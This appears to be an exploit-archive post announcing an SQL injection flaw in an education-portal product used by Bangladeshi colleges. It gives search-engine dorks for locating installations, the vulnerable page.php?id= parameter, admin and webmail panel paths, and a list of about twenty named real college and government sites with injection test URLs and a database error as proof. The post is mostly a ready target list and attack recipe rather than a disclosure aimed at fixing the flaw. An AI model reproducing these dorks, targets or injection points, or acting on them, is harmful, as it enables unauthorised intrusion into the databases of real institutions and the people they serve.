facebook facebook twitter rss

Technical Assistance explore IT Bangladesh Education Portals SQL Injection Vulnerability

Author: KingSkrupellos , Published: 10-10-2018
# Exploit Title : Technical Assistance explore IT Bangladesh Education Portals SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 04/09/2018
# Vendor Homepage : exploreit.com.bd
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
# CXSecurity : cxsecurity.com/ascii/WLB-2018090026

#################################################################################################

# Google Dork : intext:''Technical Assistance explore IT''

+ inurl:/page.php?id= Technical Assistance explore IT

inurl:/staff_attendance.php Technical Assistance explore IT site:edu.bd

# Exploit : /page.php?id=[SQL Injection]

# Admin Control Panel Paths =>

/admin
webmail.TARGETSITE.edu.bd
TARGETSITE.edu.bd:2095

#################################################################################################

# Example Vulnerable Sites =>

mmcitycollege.edu.bd/page.php?id=40%27 => [ Proof of Concept for SQL Injection ] => archive.is/3bfDQ

govmujibcollege.edu.bd/page.php?id=32%27

cgsacollege.edu.bd/page.php?id=30%27

mgcfeni.edu.bd/page.php?id=23%27

noakhalicoll.gov.bd/page.php?id=15%27

starlightcollegesylhet.edu.bd/page.php?id=6%27

raipurgovtcollege.edu.bd/page.php?id=6%27

laxmipurgovtcollege.edu.bd/page.php?id=161%27

mirpurcollege.edu.bd/page.php?id=4%27

cgsacollege.edu.bd/page.php?id=10%27

nrcbhola.edu.bd/page.php?id=1%27

bahcghs.edu.bd/page.php?id=11%27

ccc.gov.bd/page.php?id=1%27

gdc.gov.bd/page.php?id=1%27

slrcollege.gov.bd/page.php?id=5%27

kgmc.gov.bd/page.php?id=14%27

hatiyadwipcollege.gov.bd/page.php?id=9%27

slrcollege.gov.bd/page.php?id=32%27

ngmc.gov.bd/page.php?id=3%27

# SQL Database Error =>

You have an error in your SQL syntax; check the manual that corresponds

to your MySQL server version for the right syntax to use near ''40''' at line 1

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################

Like us on Facebook :